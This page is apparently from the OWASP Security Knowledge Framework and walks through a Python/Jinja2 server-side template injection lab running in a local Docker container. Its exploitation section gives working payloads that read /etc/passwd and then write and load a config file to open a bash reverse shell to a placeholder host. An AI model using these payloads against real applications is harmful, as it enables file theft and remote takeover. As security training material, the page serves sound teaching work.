Security Knowledge Framework
  • Introduction
  • Auth Bypass
    • Python - Auth Bypass
    • NodeJS - Auth Bypass
  • Auth Bypass - 1
    • Python - Auth Bypass - 1
    • NodeJS - Auth Bypass - 1
    • Java - Auth Bypass - 1
  • Auth Bypass - 2
    • Python - Auth Bypass - 2
    • NodeJS - Auth Bypass - 2
    • Java - Auth Bypass - 2
  • Auth-bypass - 3
    • Python - Auth-bypass - 3
    • NodeJS - Auth-bypass - 3
    • Java - Auth-bypass - 3
  • Auth-bypass - Simple
    • Python - Auth-bypass - Simple
    • NodeJS - Auth-bypass - Simple
    • Java - Auth-bypass - Simple
  • Client Side Restriction Bypass
    • Python - Client Side Restriction Bypass
    • NodeJS - Client Side Restriction Bypass
    • Java - Client Side Restriction Bypass
  • Client Side Restriction Bypass - Harder
    • Python - Client Side Restriction Bypass - Harder
    • NodeJS - Client Side Restriction Bypass - Harder
    • Java - Client Side Restriction Bypass - Harder
  • Client Side Template Injection (CSTI)
    • Python - Client Side Template Injection (CSTI)
    • NodeJS - Client Side Template Injection (CSTI)
    • Java - Client Side Template Injection (CSTI)
  • Command Injection (CMD)
    • Python - Command Injection (CMD)
    • NodeJS - Command Injection (CMD)
    • Java - Command Injection (CMD)
  • Command Injection 2 (CMD-2)
    • Python - Command Injection 2 (CMD-2)
    • NodeJS - Command Injection 2 (CMD-2)
    • Java - Command Injection 2 (CMD-2)
  • Command Injection 3 (CMD-3)
    • Python - Command Injection 3 (CMD-3)
    • Java - Command Injection 3 (CMD-3)
  • Command Injection 4 (CMD-4)
    • Python - Command Injection 4 (CMD-4)
    • NodeJS - Command Injection 4 (CMD-4)
    • Java - Command Injection 4 (CMD-4)
  • Command Injection Blind (CMD-Blind)
    • Python - Command Injection Blind (CMD-Blind)
    • NodeJS - Command Injection Blind (CMD-Blind)
    • Java - Command Injection Blind (CMD-Blind)
  • Content-Security-Policy (CSP)
    • Python - Content-Security-Policy (CSP)
    • NodeJS - Content-Security-Policy (CSP)
    • Java - Content-Security-Policy (CSP)
  • CORS exploitation
    • Python - CORS exploitation
    • Java - CORS exploitation
  • Credentials Guessing
    • Python - Credentials Guessing
    • NodeJS - Credentials Guessing
    • Java - Credentials Guessing
  • Credentials Guessing - 2
    • Python - Credentials Guessing - 2
    • NodeJS - Credentials Guessing - 2
    • Java - Credentials Guessing - 2
  • Cross Site Scripting (XSS)
    • Python - XSS
    • NodeJS - XSS
    • Java - XSS
  • Cross Site Scripting - Attribute (XSS-Attribute)
    • Python - XSS-Attribute
    • NodeJS - XSS-Attribute
  • Cross Site Scripting - href (XSS-href)
    • Python - XSS-href
    • NodeJS - XSS-href
    • Java - XSS-href
  • Cross Site Scripting - DOM (XSS-DOM)
    • Python - XSS-DOM
    • NodeJS - XSS-DOM
    • Java - XSS-DOM
  • Cross Site Scripting - DOM-2 (XSS-DOM-2)
    • Python - XSS-DOM-2
    • NodeJS - XSS-DOM-2
    • Java - XSS-DOM-2
  • Cross Site Scripting - Stored (XSS-Stored)
    • Java - XSS-Stored
  • CSRF
    • Python - CSRF
    • NodeJS - CSRF
    • Java - CSRF
  • CSRF - Samesite
    • Python - CSRF-SameSite
    • NodeJS - CSRF-SameSite
    • Java - CSRF-SameSite
  • CSRF - Weak
    • Python - CSRF-Weak
    • NodeJS - CSRF-Weak
    • Java - CSRF-Weak
  • CSS Injection (CSSI)
    • Python - CSS Injection (CSSI)
    • NodeJS - CSS Injection (CSSI)
    • Java - CSS Injection (CSSI)
  • Deserialisation Java (DES-Java)
    • Java - Deserialisation Java (DES-Java)
  • Deserialisation Yaml (DES-Yaml)
    • Python - Deserialisation Yaml (DES-Yaml)
  • Deserialisation Pickle (DES-Pickle)
    • Python - Deserialisation Pickle (DES-Pickle)
  • Deserialisation Pickle 2 (DES-Pickle-2)
    • Python - Deserialisation Pickle 2 (DES-Pickle-2)
  • DoS Regex
    • Python - DoS Regex
    • NodeJS - DoS Regex
    • Java - DoS Regex
  • File upload
    • Python - File-Upload
    • NodeJS - File-Upload
    • Java - File-Upload
  • Formula Injection
    • Python - Formula Injection
    • NodeJS - Formula Injection
    • Java - Formula Injection
  • GraphQL DOS
    • Python - GraphQL DOS
  • GraphQL IDOR
    • Python - GraphQL IDOR
    • NodeJS - GraphQL IDOR
    • Java - GraphQL IDOR
  • GraphQL Injections
    • Python - GraphQL Injections
    • NodeJS - GraphQL Injections
    • Java - GraphQL Injections
  • GraphQL Introspection
    • Python - GraphQL Introspection
    • NodeJS - GraphQL Introspection
    • Java - GraphQL Introspection
  • GraphQL Mutations
    • Python - GraphQL Mutations
    • NodeJS - GraphQL Mutations
    • Java - GraphQL Mutations
  • Host Header Injection (Authentication Bypass)
    • Python - HttpOnly Session Hijacking XSS
  • HttpOnly Session Hijacking XSS
    • Python - HttpOnly Session Hijacking XSS
    • NodeJS - HttpOnly Session Hijacking XSS
    • Java - HttpOnly Session Hijacking XSS
  • Information Leakeage in Comments
    • Python - Information Leakeage in Comments
    • NodeJS - Information Leakeage in Comments
    • Java - Information Leakeage in Comments
  • Information Leakeage in Metadata
    • Python - Information Leakeage in Metadata
    • NodeJS - Information Leakeage in Metadata
    • Java - Information Leakeage in Metadata
  • Insecure Direct Object References (IDOR)
    • Python - Insecure Direct Object References (IDOR)
    • NodeJS - Insecure Direct Object References (IDOR)
    • Java - Insecure Direct Object References (IDOR)
  • JWT Null
    • Python - JWT Null
    • NodeJS - JWT Null
    • Java - JWT Null
  • JWT Secret
    • Python - JWT Secret
    • NodeJS - JWT Secret
    • Java - JWT Secret
  • Ldap Injection
    • Python - Ldap Injection
    • NodeJS - Ldap Injection
    • Java - Ldap Injection
  • Ldap Injection - harder
    • Python - Ldap Injection - harder
    • NodeJS - Ldap Injection - harder
    • Java - Ldap Injection - harder
  • Local File Inclusion 1 (LFI-1)
    • Python - Local File Inclusion 1 (LFI-1)
    • NodeJS - Local File Inclusion 1 (LFI-1)
    • Java - Local File Inclusion 1 (LFI-1)
  • Local File Inclusion 2 (LFI-2)
    • Python - Local File Inclusion 2 (LFI-2)
    • NodeJS - Local File Inclusion 2 (LFI-2)
    • Java - Local File Inclusion 2 (LFI-2)
  • Local File Inclusion 3 (LFI-3)
    • Python - Local File Inclusion 3 (LFI-3)
    • NodeJS - Local File Inclusion 3 (LFI-3)
    • Java - Local File Inclusion 3 (LFI-3)
  • Parameter Binding
    • Ruby - Parameter Binding
    • NodeJS - Parameter Binding
    • Java - Parameter Binding
  • Prototype Pollution
    • NodeJS - Prototype Pollution
  • Race Condition
    • Python - Race Condition
    • NodeJS - Race Condition
    • Java - Race Condition
  • Race Condition File-Write
    • Python - Race Condition File-Write
    • NodeJS - Race Condition File-Write
    • Java - Race Condition File-Write
  • Ratelimiting (Brute-force login)
    • Python - Ratelimiting
    • NodeJS - Ratelimiting
    • Java - Ratelimiting
  • Remote File Inclusion (RFI)
    • Python - Remote File Inclusion (RFI)
    • NodeJS - Remote File Inclusion (RFI)
    • Java - Remote File Inclusion (RFI)
  • Right To Left Override (RTLO)
    • Python - Right To Left Override (RTLO)
    • NodeJS - Right To Left Override (RTLO)
    • Java - Right To Left Override (RTLO)
  • Server Side Request Forgery (SSRF)
    • Python - Server Side Request Forgery (SSRF)
    • NodeJS - Server Side Request Forgery (SSRF)
  • Server Side Template Injection (SSTI)
    • Python - Server Side Template Injection (SSTI)
    • Java - Server Side Template Injection (SSTI)
  • Session Hijacking XSS
  • Session Puzzling
    • Python - Session Puzzling
    • NodeJS - Session Puzzling
    • Java - Session Puzzling
  • Session Management 1
    • Python - Session Management 1
  • SQLI (Union)
    • Python - SQLI (Union)
    • NodeJS - SQLI (Union)
    • Java - SQLI (Union)
  • SQLI Login Bypass
    • Python - Login Bypass
  • SQLI (Like)
    • Python - SQLI (Like)
    • NodeJS - SQLI (Like)
    • Java - SQLI (Like)
  • SQLI (Blind)
    • Python - SQLI (Blind)
    • NodeJS - SQLI (Blind)
    • Java - SQLI (Blind)
  • TLS Downgrade
    • Python - TLS Downgrade
  • Untrusted Sources (XSSI)
    • Python - Untrusted Sources (XSSI)
    • NodeJS - Untrusted Sources (XSSI)
    • Java - Untrusted Sources (XSSI)
  • URL Redirection
    • Python - URL Redirection
    • NodeJS - URL Redirection
    • Java - URL Redirection
  • URL Redirection - Harder
    • Python - URL Redirection - Harder
    • NodeJS - URL Redirection - Harder
    • Java - URL Redirection - Harder
  • URL Redirection - Harder-2
    • Python - URL Redirection - Harder-2
    • NodeJS - URL Redirection - Harder-2
    • Java - URL Redirection - Harder-2
  • WebSocket Message Manipulation
    • Python - WebSocket Message Manipulation
  • XML External Entity (XXE)
    • Python - XXE
    • NodeJS - XXE
    • Java - XXE
  • Exposed docker daemon
    • Python - Exposed docker daemon
  • Insecure Random
    • Python - Insecure Random
  • template item
Powered by GitBook
On this page
  • Running the app on Docker
  • Reconnaissance
  • Exploitation
  • Additional sources

Was this helpful?

Edit on GitHub
Export as PDF
  1. Server Side Template Injection (SSTI)

Python - Server Side Template Injection (SSTI)

PreviousServer Side Template Injection (SSTI)NextJava - Server Side Template Injection (SSTI)

Last updated 2 years ago

Was this helpful?

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:ssti
$ sudo docker run -ti -p 127.0.19.1:9000:9000 blabla1337/owasp-skf-lab:ssti

Now that the app is running let's go hacking!

Reconnaissance

Step 1

As with all reconnaissance we first have to determine the type of application that is running and the programming language it was written in. This could easily be achieved by setting up an intercepting proxy and study the requests and responses made by the application to the web sever.

Also, trying to trigger error messages on the application can also give away a lot of information about the application under test.

In the screenshot below in the response of the we find the python version that is running, accompanied with the server "Werkzeug". This is a clear indicator the web application might be running python flask, and python flask typically runs with the templating engine, jinja2.

Step2

Now that we have determined the type of application that is running let's try to see if any user supplied input is accepted by the application. The input from the URL is being processed directly in the application and outputted in the HTML. So now we have control of whatever is being reflected on the page. How do we now determine if the application might be susceptible to Server Side Template Injection?

First we need to do some investigation on how the syntax works, so we dive into the docs!

{% ... %} for Statements {{ ... }} for Expressions to print to the template output {# ... #} for Comments not included in the template output # ... ## for Line Statements ```

Now, we want to use expressions to print to the template output to see if our payloads are interpreted and executed on the server-side by the templating engine. The most ideal way to do so is to inject mathematical statements.

As found in the docs:

{{ 1 + 1 }} is 2.

Let's see what happens of we inject the expression with the operator described above!

Exploitation

Now, lets find some usefull injections for Jinja2. In order to build our exploit this here already looks pretty promising:

{{ ''.__class__.__mro__[2].__subclasses__() }}

After injecting the payload we now have a list of all the different classes loaded in our target application. Let's see if we can use it to read some information from the file system

On position 40 whilst iterating over the different loaded classes we find the "read" function. Let's use this function to read the "/etc/passwd" file from the filesystem.

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

As mentioned before this attack can ultimately be used also to gain remote code execution on the target application. In order to do so we first would need to set up a listener and than inject the following payloads

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
{{ config.from_pyfile('/tmp/evilconfig.cfg') }}  # load the evil config
{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host

Additional sources

A nice website with write-ups about different type of payloads on template engines is found here:

In python __mro__ or mro() allows us to go back up the tree of inherited objects in the current Python environment, and __subclasses__ lets us come back down. Read the for more. Basically, you can crawl up the inheritance tree of the known objects using mro, thus accessing every class loaded in the current python environment

http://jinja.pocoo.org/docs/2.10/templates/
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
docs
https://portswigger.net/blog/server-side-template-injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20injections#dump-all-used-classes
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti